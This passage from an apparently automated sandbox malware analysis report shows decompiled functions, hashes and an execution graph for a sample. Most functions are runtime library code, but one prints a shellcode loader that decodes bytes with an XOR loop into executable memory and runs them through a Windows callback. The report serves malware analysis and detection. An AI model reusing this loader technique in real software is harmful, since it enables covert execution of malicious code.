							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E003B2752(_t98, _t119, _t119);
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(_a8 != 0xffffffff) {
													E003B1530(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E003B1CC3())) = 0x22;
												L4:
												E003B1E89();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_v8 = _t110 + 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E003B2873(_t119));
											_t88 = E003B2A2A();
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E003B2897(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										_t120 = _t120 + 0x10;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E003B1CC3())) = 0x16;
				goto L4;
			}




























                    0x003b12c6
                    0x003b12c9
                    0x003b12cf
                    0x003b12d2
                    0x003b12d5
                    0x003b12f2
                    0x00000000
                    0x003b12f2
                    0x003b12d7
                    0x003b12dc
                    0x00000000
                    0x00000000
                    0x003b12e0
                    0x003b12fb
                    0x003b12fe
                    0x003b1300
                    0x003b130e
                    0x003b130e
                    0x003b1312
                    0x003b131a
                    0x003b131f
                    0x003b131f
                    0x003b1322
                    0x003b1324
                    0x00000000
                    0x003b1326
                    0x003b1326
                    0x003b132e
                    0x003b1330
                    0x00000000
                    0x00000000
                    0x003b1332
                    0x003b1335
                    0x003b1338
                    0x003b133f
                    0x003b1341
                    0x003b1348
                    0x003b1343
                    0x003b1343
                    0x003b1343
                    0x003b134d
                    0x003b1350
                    0x003b1352
                    0x003b143b
                    0x00000000
                    0x003b1358
                    0x003b1358
                    0x003b1358
                    0x003b135f
                    0x003b13a0
                    0x003b13a0
                    0x003b13a2
                    0x003b140d
                    0x003b1413
                    0x003b1416
                    0x003b146d
                    0x00000000
                    0x003b1473
                    0x003b1418
                    0x003b141b
                    0x003b141d
                    0x003b1443
                    0x003b1443
                    0x003b1447
                    0x003b1451
                    0x003b1456
                    0x003b145e
                    0x003b12ed
                    0x003b12ed
                    0x00000000
                    0x003b12ed
                    0x003b141f
                    0x003b1422
                    0x003b1425
                    0x003b1426
                    0x003b1429
                    0x003b1429
                    0x003b142a
                    0x003b142d
                    0x003b1430
                    0x00000000
                    0x003b1430
                    0x003b13a4
                    0x003b13a6
                    0x003b13ca
                    0x003b13cf
                    0x003b13d5
                    0x003b13d7
                    0x003b13d7
                    0x003b13a8
                    0x003b13aa
                    0x003b13b0
                    0x003b13c2
                    0x003b13c2
                    0x003b13c2
                    0x003b13c4
                    0x003b13b2
                    0x003b13b7
                    0x003b13b9
                    0x003b13b9
                    0x003b13c6
                    0x003b13c6
                    0x003b13d9
                    0x003b13dc
                    0x00000000
                    0x003b13de
                    0x003b13de
                    0x003b13df
                    0x003b13e9
                    0x003b13ea
                    0x003b13ef
                    0x003b13f2
                    0x003b13f4
                    0x003b147b
                    0x00000000
                    0x003b147b
                    0x003b13fa
                    0x003b13fd
                    0x003b1469
                    0x003b1469
                    0x003b1469
                    0x003b1469
                    0x00000000
                    0x003b1469
                    0x003b13ff
                    0x003b13ff
                    0x003b1401
                    0x003b1401
                    0x003b1404
                    0x003b1407
                    0x00000000
                    0x003b1407
                    0x003b13dc
                    0x003b1361
                    0x003b1364
                    0x003b1367
                    0x003b1369
                    0x00000000
                    0x00000000
                    0x003b136b
                    0x00000000
                    0x00000000
                    0x003b1371
                    0x003b1373
                    0x003b1375
                    0x003b1377
                    0x003b1377
                    0x003b137a
                    0x003b137d
                    0x003b137f
                    0x00000000
                    0x003b1385
                    0x003b138c
                    0x003b1391
                    0x003b1394
                    0x003b1397
                    0x003b139a
                    0x003b139c
                    0x00000000
                    0x003b139c
                    0x003b1433
                    0x003b1433
                    0x003b1433
                    0x00000000
                    0x003b1358
                    0x003b1352
                    0x003b1324
                    0x003b1307
                    0x003b130a
                    0x003b130c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x003b130c
                    0x003b12e2
                    0x003b12e7
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.319291070.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000002.00000002.319277661.00000000003B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.319320749.00000000003BE000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.319406542.00000000003C3000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.319419386.00000000003C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                    • String ID:
                    • API String ID: 1559183368-0
                    • Opcode ID: 0bb837822c449fc72efdb440be1ab00ec04426b9921edd9ac7c64893c8882779
                    • Instruction ID: 60d99b197231ce0c934cab5f082d7614c7c2df8dd9c24c669e9a0f134f01371b
                    • Opcode Fuzzy Hash: 0bb837822c449fc72efdb440be1ab00ec04426b9921edd9ac7c64893c8882779
                    • Instruction Fuzzy Hash: F251DC34A00305DBDB268F69D8A06DE77F5AF41328FA48729FA29C6DD0E770DE509B40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003B7452 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 95%
                    			E003B7452(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0x3c4834, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0x3c4830 == _t7) {
									_t9 = E003B1CC3();
									 *_t9 = E003B1CD6(GetLastError());
									goto L17;
								} else {
									if(E003B1741(_t7, _t31) == 0) {
										_t12 = E003B1CC3();
										 *_t12 = E003B1CD6(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E003B1741(_t6, _t31);
						 *((intOrPtr*)(E003B1CC3())) = 0xc;
						goto L12;
					} else {
						E003B4831(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E003B114B(__ebx, __edx, __edi, _a8);
				}
			}









                    0x003b7459
                    0x003b7467
                    0x003b746c
                    0x003b747b
                    0x003b74ae
                    0x003b7480
                    0x003b7482
                    0x003b7482
                    0x003b748f
                    0x003b7495
                    0x003b7499
                    0x003b74f9
                    0x003b74f9
                    0x003b749b
                    0x003b74a1
                    0x003b74e3
                    0x003b74f7
                    0x00000000
                    0x003b74a3
                    0x003b74ac
                    0x003b74cb
                    0x003b74df
                    0x003b74c5
                    0x003b74c5
                    0x00000000
                    0x00000000
                    0x00000000
                    0x003b74ac
                    0x003b74a1
                    0x00000000
                    0x003b74c7
                    0x003b74b4
                    0x003b74bf
                    0x00000000
                    0x003b746e
                    0x003b7471
                    0x003b7477
                    0x003b7477
                    0x003b74c8
                    0x003b74ca
                    0x003b745b
                    0x003b7465
                    0x003b7465

                    APIs
                    • _malloc.LIBCMT ref: 003B745E
                      • Part of subcall function 003B114B: __FF_MSGBANNER.LIBCMT ref: 003B1162
                      • Part of subcall function 003B114B: __NMSG_WRITE.LIBCMT ref: 003B1169
                      • Part of subcall function 003B114B: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,003B48C7,00000000,00000000,00000000,00000000,?,003B44F9,00000018,003C2280), ref: 003B118E
                    • _free.LIBCMT ref: 003B7471
                    Memory Dump Source
                    • Source File: 00000002.00000002.319291070.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000002.00000002.319277661.00000000003B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.319320749.00000000003BE000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.319406542.00000000003C3000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.319419386.00000000003C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: AllocHeap_free_malloc
                    • String ID:
                    • API String ID: 2734353464-0
                    • Opcode ID: 0eb45a5bc7ac388f54b6b3a289265d43defd3ab56fadc40803c9fb5031a37b13
                    • Instruction ID: d400fa7217a6813c91135100b6f64ce9b3d2cad94987be52578c38d940adbfbc
                    • Opcode Fuzzy Hash: 0eb45a5bc7ac388f54b6b3a289265d43defd3ab56fadc40803c9fb5031a37b13
                    • Instruction Fuzzy Hash: 5511E33280D615ABCB233F76AC55AE93FDCEF4036DF214525FB499EE50DA7089408690
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003B1000 Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 92%
                    			E003B1000(void* __ecx, void* __eflags, intOrPtr _a12) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				intOrPtr _t6;
				void* _t7;
				void* _t20;
				_Unknown_base(*)()* _t21;
				void* _t26;
				void* _t27;
				void* _t28;
				intOrPtr* _t34;

				_push(_t20);
				_t28 = 0;
				_t6 = E003B114B(_t20, _t26, 0, 0x17d78400);
				 *_t34 = 0x3c3000;
				_v8 = _t6;
				_t7 = E003B11DD(_a12, _t27);
				_t21 = VirtualAlloc(0, 0x1466, 0x3000, 0x40);
				E003B1481(_t21, 0x1466, 1, _t7);
				_t10 = _v8;
				if(_v8 != 0) {
					E003B1530(_t10, 0xcb, 0x17d78400);
					do {
						 *((char*)(_t21 + _t28)) = (( *((intOrPtr*)(_t21 + _t28)) + 0x0000006f ^ 0x00000059) + 0x0000000b ^ 0x00000054) - 0x17;
						_t28 = _t28 + 1;
					} while (_t28 < 0x1466);
					EnumSystemCodePagesW(_t21, 0);
				}
				return 0;
			}














                    0x003b1004
                    0x003b100c
                    0x003b100e
                    0x003b1013
                    0x003b101d
                    0x003b1020
                    0x003b1044
                    0x003b1048
                    0x003b104d
                    0x003b1055
                    0x003b1062
                    0x003b106a
                    0x003b1077
                    0x003b107a
                    0x003b107b
                    0x003b1082
                    0x003b1082
                    0x003b108e

                    APIs
                    • _malloc.LIBCMT ref: 003B100E
                      • Part of subcall function 003B114B: __FF_MSGBANNER.LIBCMT ref: 003B1162
                      • Part of subcall function 003B114B: __NMSG_WRITE.LIBCMT ref: 003B1169
                      • Part of subcall function 003B114B: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,003B48C7,00000000,00000000,00000000,00000000,?,003B44F9,00000018,003C2280), ref: 003B118E
                      • Part of subcall function 003B11DD: __wfsopen.LIBCMT ref: 003B11E8
                    • VirtualAlloc.KERNEL32(00000000,00001466,00003000,00000040), ref: 003B1036
                    • __fread_nolock.LIBCMT ref: 003B1048
                    • _memset.LIBCMT ref: 003B1062
                    • EnumSystemCodePagesW.KERNEL32(00000000,00000000), ref: 003B1082
                    Memory Dump Source
                    • Source File: 00000002.00000002.319291070.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000002.00000002.319277661.00000000003B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.319320749.00000000003BE000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.319406542.00000000003C3000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.319419386.00000000003C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: Alloc$CodeEnumHeapPagesSystemVirtual__fread_nolock__wfsopen_malloc_memset
                    • String ID:
                    • API String ID: 612201108-0
                    • Opcode ID: 37371f273f8dc7605030bbac49bd6b5808be28ce69042ed104c1ac73dbfc66fb
                    • Instruction ID: 2e38a4303b32ce40cae24b4c862d45957ad6e53e4632fe16628bc61f9f3e880a
                    • Opcode Fuzzy Hash: 37371f273f8dc7605030bbac49bd6b5808be28ce69042ed104c1ac73dbfc66fb
                    • Instruction Fuzzy Hash: E30147729053447BE722277A9C4BFDB3B5CCB52B5CF500425FB019A182E5E499029274
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003B8BC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                    Download Yara Rule
                    C-Code - Quality: 77%
                    			E003B8BC0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t4;
				void* _t15;
				void* _t17;

				_push(8);
				_push(0x3c24b0);
				_t4 = E003B2400(__ebx, __edi, __esi);
				_t17 =  *0x3c3d3c - 0x3c3d40; // 0x3c3d40
				if(_t17 != 0) {
					E003B442F(0xc);
					 *(_t15 - 4) =  *(_t15 - 4) & 0x00000000;
					 *0x3c3d3c = E003B73D6("@=<", 0x3c3d40);
					 *(_t15 - 4) = 0xfffffffe;
					_t4 = E003B8C09();
				}
				return E003B2445(_t4);
			}






                    0x003b8bc0
                    0x003b8bc2
                    0x003b8bc7
                    0x003b8bd1
                    0x003b8bd7
                    0x003b8bdb
                    0x003b8be1
                    0x003b8bf2
                    0x003b8bf7
                    0x003b8bfe
                    0x003b8bfe
                    0x003b8c08

                    APIs
                    • __lock.LIBCMT ref: 003B8BDB
                      • Part of subcall function 003B442F: __mtinitlocknum.LIBCMT ref: 003B4441
                      • Part of subcall function 003B442F: EnterCriticalSection.KERNEL32(00000000,?,003B37AB,0000000D), ref: 003B445A
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 003B8BEB
                      • Part of subcall function 003B73D6: ___addlocaleref.LIBCMT ref: 003B73F2
                      • Part of subcall function 003B73D6: ___removelocaleref.LIBCMT ref: 003B73FD
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319291070.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000002.00000002.319277661.00000000003B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.319320749.00000000003BE000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.319406542.00000000003C3000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.319419386.00000000003C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: CriticalEnterEx_nolockSection___addlocaleref___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                    • String ID: @=<$@=<
                    • API String ID: 3307898166-522152547
                    • Opcode ID: dff810c5e7d389fa50397f59b51fc7cd5435a04b6d428c132332e9e3c892fa37
                    • Instruction ID: a5f234f2f53e71cc729f41302692f6212e64a8ca5f508f7b5c9ebec28bc15cbb
                    • Opcode Fuzzy Hash: dff810c5e7d389fa50397f59b51fc7cd5435a04b6d428c132332e9e3c892fa37
                    • Instruction Fuzzy Hash: EBE08661481300D6D65377617807FCDA6749B0072AF10D10AF2159E9C1CEB45E408B66
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003BA94D Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E003BA94D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E003BAE9E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E003BA9D3(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E003BB119(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E003BB058(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                    0x003ba950
                    0x003ba956
                    0x003ba9c9
                    0x00000000
                    0x003ba95d
                    0x003ba95d
                    0x003ba960
                    0x003ba97b
                    0x003ba97e
                    0x003ba99e
                    0x003ba9b0
                    0x003ba980
                    0x003ba980
                    0x003ba983
                    0x00000000
                    0x003ba985
                    0x003ba997
                    0x003ba997
                    0x003ba983
                    0x003ba9ce
                    0x003ba9d2
                    0x003ba962
                    0x003ba97a
                    0x003ba97a
                    0x003ba960

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.319291070.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000002.00000002.319277661.00000000003B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.319320749.00000000003BE000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.319406542.00000000003C3000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.319419386.00000000003C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction ID: 791246b61bd22ebdfa6a228266e53b4722b2487872a4a3b9bbf5b3af0b705a21
                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction Fuzzy Hash: 0E013972044A4EBBCF135E84CC418EE3F66BB19358B5A8515FB1958831D736C9B1BB82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016FFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                    Download Yara Rule
                    C-Code - Quality: 53%
                    			E016FFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E016ACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E016F5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E016F5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                    0x016ffdda
                    0x016ffde2
                    0x016ffde5
                    0x016ffdec
                    0x016ffdfa
                    0x016ffdff
                    0x016ffe0a
                    0x016ffe0f
                    0x016ffe17
                    0x016ffe1e
                    0x016ffe19
                    0x016ffe19
                    0x016ffe19
                    0x016ffe20
                    0x016ffe21
                    0x016ffe22
                    0x016ffe25
                    0x016ffe40

                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016FFDFA
                    Strings
                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016FFE01
                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016FFE2B
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                    • API String ID: 885266447-3903918235
                    • Opcode ID: 312d6525b9df26b98b36308ac9c8fcd9cf8862acf02268bc1b2a0bed58dfc443
                    • Instruction ID: f32eab876afa6909820bc139aa5b3f271e43e279468b4b688cb3d82652ca79c8
                    • Opcode Fuzzy Hash: 312d6525b9df26b98b36308ac9c8fcd9cf8862acf02268bc1b2a0bed58dfc443
                    • Instruction Fuzzy Hash: 08F0C272640202BBE6201A45DC02E23BF5AEB44B30F14021CF728561D1EA62BC2086A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:4.8%
                    Dynamic/Decrypted Code Coverage:2%
                    Signature Coverage:0%
                    Total number of Nodes:596
                    Total number of Limit Nodes:70
                    execution_graph 33616 98f0de 33617 98f118 33616->33617 33620 98b9d0 33617->33620 33621 98b9f6 33620->33621 33628 979d40 33621->33628 33623 98ba02 33624 98ba26 33623->33624 33636 978f30 33623->33636 33674 98a6b0 33624->33674 33677 979c90 33628->33677 33630 979d4d 33631 979d54 33630->33631 33689 979c30 33630->33689 33631->33623 33637 978f57 33636->33637 34111 97b1c0 33637->34111 33639 978f69 34115 97af10 33639->34115 33641 978f86 33649 978f8d 33641->33649 34186 97ae40 LdrLoadDll 33641->34186 33643 9790f2 33643->33624 33645 978ffc 34131 97f410 33645->34131 33647 979006 33647->33643 33648 98bf90 2 API calls 33647->33648 33650 97902a 33648->33650 33649->33643 34119 97f380 33649->34119 33651 98bf90 2 API calls 33650->33651 33652 97903b 33651->33652 33653 98bf90 2 API calls 33652->33653 33654 97904c 33653->33654 34143 97ca90 33654->34143 33656 979059 33657 984a50 8 API calls 33656->33657 33658 979066 33657->33658 33659 984a50 8 API calls 33658->33659 33660 979077 33659->33660 33661 9790a5 33660->33661 33662 979084 33660->33662 33663 984a50 8 API calls 33661->33663 34153 97d620 33662->34153 33671 9790c1 33663->33671 33666 9790e9 33669 978d00 23 API calls 33666->33669 33668 979092 34169 978d00 33668->34169 33669->33643 33671->33666 34187 97d6c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33671->34187 33675 98af60 LdrLoadDll 33674->33675 33676 98a6cf 33675->33676 33709 988bc0 33677->33709 33681 979cb6 33681->33630 33682 979cac 33682->33681 33716 98b2b0 33682->33716 33684 979cf3 33684->33681 33727 979ab0 33684->33727 33686 979d13 33733 979620 LdrLoadDll 33686->33733 33688 979d25 33688->33630 33690 979c44 33689->33690 34085 98b5a0 33690->34085 33693 98b5a0 LdrLoadDll 33694 979c5b 33693->33694 33695 98b5a0 LdrLoadDll 33694->33695 33696 979c71 33695->33696 33697 97f180 33696->33697 33698 97f199 33697->33698 34094 97b040 33698->34094 33700 97f1ac 34098 98a1e0 33700->34098 33703 979d65 33703->33623 33705 97f1d2 33706 97f1fd 33705->33706 34104 98a260 33705->34104 33708 98a490 2 API calls 33706->33708 33708->33703 33710 988bcf 33709->33710 33734 984e50 33710->33734 33712 979ca3 33713 988a70 33712->33713 33740 98a600 33713->33740 33717 98b2c9 33716->33717 33747 984a50 33717->33747 33719 98b2e1 33720 98b2ea 33719->33720 33786 98b0f0 33719->33786 33720->33684 33722 98b2fe 33722->33720 33804 989f00 33722->33804 34063 977ea0 33727->34063 33729 979ad1 33729->33686 33730 979aca 33730->33729 34076 978160 33730->34076 33733->33688 33735 984e6a 33734->33735 33736 984e5e 33734->33736 33735->33712 33736->33735 33739 9852d0 LdrLoadDll 33736->33739 33738 984fbc 33738->33712 33739->33738 33743 98af60 33740->33743 33742 988a85 33742->33682 33744 98af70 33743->33744 33745 98af92 33743->33745 33746 984e50 LdrLoadDll 33744->33746 33745->33742 33746->33745 33748 984a64 33747->33748 33749 984d85 33747->33749 33748->33749 33812 989c50 33748->33812 33749->33719 33752 984b7d 33752->33719 33753 984b90 33815 98a360 33753->33815 33754 984b73 33873 98a460 LdrLoadDll 33754->33873 33757 984bb7 33758 98bdc0 2 API calls 33757->33758 33760 984bc3 33758->33760 33759 984d49 33762 98a490 2 API calls 33759->33762 33760->33752 33760->33759 33761 984d5f 33760->33761 33766 984c52 33760->33766 33882 984790 LdrLoadDll NtReadFile NtClose 33761->33882 33764 984d50 33762->33764 33764->33719 33765 984d72 33765->33719 33767 984cb9 33766->33767 33769 984c61 33766->33769 33767->33759 33768 984ccc 33767->33768 33875 98a2e0 33768->33875 33771 984c7a 33769->33771 33772 984c66 33769->33772 33775 984c7f 33771->33775 33776 984c97 33771->33776 33874 984650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33772->33874 33819 9846f0 33775->33819 33776->33764 33831 984410 33776->33831 33778 984c70 33778->33719 33781 984d2c 33879 98a490 33781->33879 33782 984c8d 33782->33719 33783 984caf 33783->33719 33785 984d38 33785->33719 33787 98b101 33786->33787 33788 98b113 33787->33788 33902 98bd40 33787->33902 33788->33722 33790 98b134 33905 984070 33790->33905 33792 98b180 33792->33722 33793 98b157 33793->33792 33794 984070 3 API calls 33793->33794 33796 98b179 33794->33796 33796->33792 33937 985390 33796->33937 33797 98b20a 33798 98b21a 33797->33798 34031 98af00 LdrLoadDll 33797->34031 33947 98ad70 33798->33947 33801 98b248 34026 989ec0 33801->34026 33805 989f1c 33804->33805 33806 98af60 LdrLoadDll 33804->33806 34057 53f967a 33805->34057 33806->33805 33807 989f37 33809 98bdc0 33807->33809 34060 98a670 33809->34060 33811 98b359 33811->33684 33813 98af60 LdrLoadDll 33812->33813 33814 984b44 33813->33814 33814->33752 33814->33753 33814->33754 33816 98af60 LdrLoadDll 33815->33816 33817 98a37c NtCreateFile 33816->33817 33817->33757 33820 98470c 33819->33820 33821 98a2e0 LdrLoadDll 33820->33821 33822 98472d 33821->33822 33823 984748 33822->33823 33824 984734 33822->33824 33825 98a490 2 API calls 33823->33825 33826 98a490 2 API calls 33824->33826 33827 984751 33825->33827 33828 98473d 33826->33828 33883 98bfd0 33827->33883 33828->33782 33830 98475c 33830->33782 33832 98445b 33831->33832 33833 98448e 33831->33833 33835 98a2e0 LdrLoadDll 33832->33835 33834 9845d9 33833->33834 33838 9844aa 33833->33838 33836 98a2e0 LdrLoadDll 33834->33836 33837 984476 33835->33837 33843 9845f4 33836->33843 33839 98a490 2 API calls 33837->33839 33841 98a2e0 LdrLoadDll 33838->33841 33840 98447f 33839->33840 33840->33783 33842 9844c5 33841->33842 33845 9844cc 